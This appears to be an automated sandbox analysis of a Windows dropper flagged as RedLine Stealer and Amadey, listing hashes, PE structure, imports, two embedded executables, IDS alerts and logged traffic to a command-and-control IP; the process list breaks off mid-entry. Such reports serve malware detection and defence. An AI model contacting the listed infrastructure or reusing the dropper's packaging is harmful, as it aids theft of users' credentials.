                                                                                                                                                                                                                                            MD5:EF8079CF160510D0DA7162BC08F753D8
                                                                                                                                                                                                                                            SHA1:E786CC8BEE83E4A37433DDCCF9D3540E1F6533FE
                                                                                                                                                                                                                                            SHA-256:A6416CA607F03E7D02DD9C8B546113C71F421C0BA8438DAFB941D25F8CF2C9E6
                                                                                                                                                                                                                                            SHA-512:959B08126358527B794A276F6E9F818250F888D9F108B46766F6C2E50186ACC8F406ACBEB94CA97B5F0E329B27F3851003446715D5D040B5C0FEF4010011A2C3
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, Author: ditekSHen
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.................0.................. ........@.. ....................... ............@.................................8...O.......$............................................................................ ............... ..H............text....... ...................... ..`.rsrc...$...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Entropy (8bit):7.893905919977697
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                            File name:file.exe
                                                                                                                                                                                                                                            File size:798720
                                                                                                                                                                                                                                            MD5:e46fc629e1740020f4cb10f793d38689
                                                                                                                                                                                                                                            SHA1:b0bc2f9f5ad244c3c15160b389a66252adab9e0c
                                                                                                                                                                                                                                            SHA256:f488772ca9291e830b797022be6c0c808e8963654276eb7c2c117279b41b69af
                                                                                                                                                                                                                                            SHA512:d609c308b0845af692de0ab50652833d6521cf32b5407d7b3911b31002390fd3cd0fae7a1520efb4f5309eabdff540324ddc1613cf11ef195e8d278a3c44d128
                                                                                                                                                                                                                                            SSDEEP:24576:lyMVZzgFu582HFLw5EPhnME7sNUmocom3:AMPzgFAZZn/7XmVom
                                                                                                                                                                                                                                            TLSH:FE05120BEBF98432E8F2837448FA07C31A367E65577883A6235F6D2918236B4A175717
                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                                                                                                                                                                                                                                            Icon Hash:f8e0e4e8ecccc870
                                                                                                                                                                                                                                            Entrypoint:0x406a60
                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                            Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                            OS Version Major:10
                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                            File Version Major:10
                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                            Subsystem Version Major:10
                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                            Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                            call 00007F2674C55195h
                                                                                                                                                                                                                                            jmp 00007F2674C54AA5h
                                                                                                                                                                                                                                            push 00000058h
                                                                                                                                                                                                                                            push 004072B8h
                                                                                                                                                                                                                                            call 00007F2674C55237h
                                                                                                                                                                                                                                            xor ebx, ebx
                                                                                                                                                                                                                                            mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                                                            lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                            call dword ptr [0040A184h]
                                                                                                                                                                                                                                            mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                                                            mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                                                            mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                                                            mov edi, ebx
                                                                                                                                                                                                                                            mov edx, 004088ACh
                                                                                                                                                                                                                                            mov ecx, esi
                                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                                            lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                            je 00007F2674C54ABAh
                                                                                                                                                                                                                                            cmp eax, esi
                                                                                                                                                                                                                                            jne 00007F2674C54AA9h
                                                                                                                                                                                                                                            xor esi, esi
                                                                                                                                                                                                                                            inc esi
                                                                                                                                                                                                                                            mov edi, esi
                                                                                                                                                                                                                                            jmp 00007F2674C54AB2h
                                                                                                                                                                                                                                            push 000003E8h
                                                                                                                                                                                                                                            call dword ptr [0040A188h]
                                                                                                                                                                                                                                            jmp 00007F2674C54A79h
                                                                                                                                                                                                                                            xor esi, esi
                                                                                                                                                                                                                                            inc esi
                                                                                                                                                                                                                                            cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                                                            jne 00007F2674C54AACh
                                                                                                                                                                                                                                            push 0000001Fh
                                                                                                                                                                                                                                            call 00007F2674C54FCBh
                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                            jmp 00007F2674C54ADCh
                                                                                                                                                                                                                                            cmp dword ptr [004088B0h], ebx
                                                                                                                                                                                                                                            jne 00007F2674C54ACEh
                                                                                                                                                                                                                                            mov dword ptr [004088B0h], esi
                                                                                                                                                                                                                                            push 004010C4h
                                                                                                                                                                                                                                            push 004010B8h
                                                                                                                                                                                                                                            call 00007F2674C54BF6h
                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                            je 00007F2674C54AB9h
                                                                                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                                                            mov eax, 000000FFh
                                                                                                                                                                                                                                            jmp 00007F2674C54BD9h
                                                                                                                                                                                                                                            mov dword ptr [004081E4h], esi
                                                                                                                                                                                                                                            cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                                                            jne 00007F2674C54ABDh
                                                                                                                                                                                                                                            push 004010B4h
                                                                                                                                                                                                                                            push 004010ACh
                                                                                                                                                                                                                                            call 00007F2674C55185h
                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                            mov dword ptr [000088B0h], 00000000h
                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000xba8b4.rsrc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc70000x888.reloc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                            .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .rsrc0xc0000xbb0000xbaa00False0.9502155894172807data7.9217119746488125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .reloc0xc70000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                                            AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                                                                                                                                                                                                                                            RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                                                                                                                                                                                                            RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                                                                                                                                                                                                            RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                                                                                                                                                                                                                                            RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                                                                                                                                                                                                            RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                            RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                            RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                            RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                            RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                                                                                                                            RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                                                                                                                                                                                            RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                                                                                                                                                                                            RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                                                                                                                                                                                                            RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                                                                                                                                                                                                            RT_DIALOG0x247400x2f2dataEnglishUnited States
                                                                                                                                                                                                                                            RT_DIALOG0x24a340x35cdataRussianRussia
                                                                                                                                                                                                                                            RT_DIALOG0x24d900x1b0dataEnglishUnited States
                                                                                                                                                                                                                                            RT_DIALOG0x24f400x1b4dataRussianRussia
                                                                                                                                                                                                                                            RT_DIALOG0x250f40x166dataEnglishUnited States
                                                                                                                                                                                                                                            RT_DIALOG0x2525c0x168dataRussianRussia
                                                                                                                                                                                                                                            RT_DIALOG0x253c40x1c0dataEnglishUnited States
                                                                                                                                                                                                                                            RT_DIALOG0x255840x1e0dataRussianRussia
                                                                                                                                                                                                                                            RT_DIALOG0x257640x130dataEnglishUnited States
                                                                                                                                                                                                                                            RT_DIALOG0x258940x150dataRussianRussia
                                                                                                                                                                                                                                            RT_DIALOG0x259e40x120dataEnglishUnited States
                                                                                                                                                                                                                                            RT_DIALOG0x25b040x122dataRussianRussia
                                                                                                                                                                                                                                            RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                                                                                                                                                                                                                                            RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                                                                                                                                                                                                                                            RT_STRING0x25d3c0x520dataEnglishUnited States
                                                                                                                                                                                                                                            RT_STRING0x2625c0x52edataRussianRussia
                                                                                                                                                                                                                                            RT_STRING0x2678c0x5ccdataEnglishUnited States
                                                                                                                                                                                                                                            RT_STRING0x26d580x592dataRussianRussia
                                                                                                                                                                                                                                            RT_STRING0x272ec0x4b0dataEnglishUnited States
                                                                                                                                                                                                                                            RT_STRING0x2779c0x4b2dataRussianRussia
                                                                                                                                                                                                                                            RT_STRING0x27c500x44adataEnglishUnited States
                                                                                                                                                                                                                                            RT_STRING0x2809c0x43edataRussianRussia
                                                                                                                                                                                                                                            RT_STRING0x284dc0x3cedataEnglishUnited States
                                                                                                                                                                                                                                            RT_STRING0x288ac0x2fcdataRussianRussia
                                                                                                                                                                                                                                            RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0x28bb00x9cbd8Microsoft Cabinet archive data, many, 642008 bytes, 2 files, at 0x2c +A "fuN31PL.exe" +A "dXL24Wx.exe", ID 1862, number 1, 26 datablocks, 0x1503 compressionEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57880x4dataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc578c0x24dataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57b00x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57b80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57c00x4dataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57c40xcdataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57d00x4dataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57d40xcdataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57e00x4dataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57e40x6dataEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57ec0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                            RT_RCDATA0xc57f40x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                            RT_GROUP_ICON0xc57fc0xbcdataEnglishUnited States
                                                                                                                                                                                                                                            RT_VERSION0xc58b80x408dataEnglishUnited States
                                                                                                                                                                                                                                            RT_VERSION0xc5cc00x410dataRussianRussia
                                                                                                                                                                                                                                            RT_MANIFEST0xc60d00x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                            ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                                                                                                                                                            KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                                                                                                                                                                                                            GDI32.dllGetDeviceCaps
                                                                                                                                                                                                                                            USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                                                                                                                                                                                                            msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                                                                                                                                                                                                            COMCTL32.dll
                                                                                                                                                                                                                                            Cabinet.dll
                                                                                                                                                                                                                                            VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                                                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                            EnglishUnited States
                                                                                                                                                                                                                                            RussianRussia
                                                                                                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            193.233.20.11192.168.2.44131496962043234 02/10/23-06:58:48.059056TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            192.168.2.4193.233.20.114969641312043231 02/10/23-06:58:59.386011TCP2043231ET TROJAN Redline Stealer TCP CnC Activity496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            192.168.2.4193.233.20.114969641312043233 02/10/23-06:58:46.675190TCP2043233ET TROJAN RedLine Stealer TCP CnC net.tcp Init496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:46.304033995 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:46.327116013 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:46.327331066 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:46.675189972 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:46.698434114 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:46.743022919 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:48.035455942 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:48.059056044 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:48.102341890 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:55.151863098 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:55.176232100 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:55.176322937 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:55.176390886 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:55.176476002 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:55.352977991 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.503948927 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.527719975 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.571799994 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.641649008 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.665410042 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.712476015 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.723665953 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.747520924 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.784410000 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.807909012 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.853085041 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.876977921 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.901232004 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.904934883 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.928361893 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.929539919 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:56.953105927 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.009349108 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.041938066 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.065212965 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.065550089 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.118748903 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.203252077 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.226495028 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.226999998 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.247813940 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.271610975 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.321888924 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.638680935 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.662203074 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.691118002 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.714617968 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.729607105 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.753021955 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.806361914 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.929862022 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.953516960 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.994833946 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.221525908 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.244714022 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.245919943 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.269107103 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.322051048 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.362087011 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.385179043 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.385457993 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.386010885 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.409384012 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.448290110 CET496964131192.168.2.4193.233.20.11

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:06:58:17
                                                                                                                                                                                                                                            Start date:10/02/2023
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                                                                            File size:798720 bytes
                                                                                                                                                                                                                                            MD5 hash:E46FC629E1740020F4CB10F793D38689
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.306383472.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                            Start time:06:58:18
                                                                                                                                                                                                                                            Start date:10/02/2023
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe
                                                                                                                                                                                                                                            Imagebase:0x1a0000
                                                                                                                                                                                                                                            File size:607232 bytes
                                                                                                                                                                                                                                            MD5 hash:1EA737E1D6A95AA35583293A9A2F5347
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            • Detection: 69%, ReversingLabs
                                                                                                                                                                                                                                            • Detection: 55%, Virustotal, Browse
                                                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                            Start time:06:58:18
                                                                                                                                                                                                                                            Start date:10/02/2023
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe
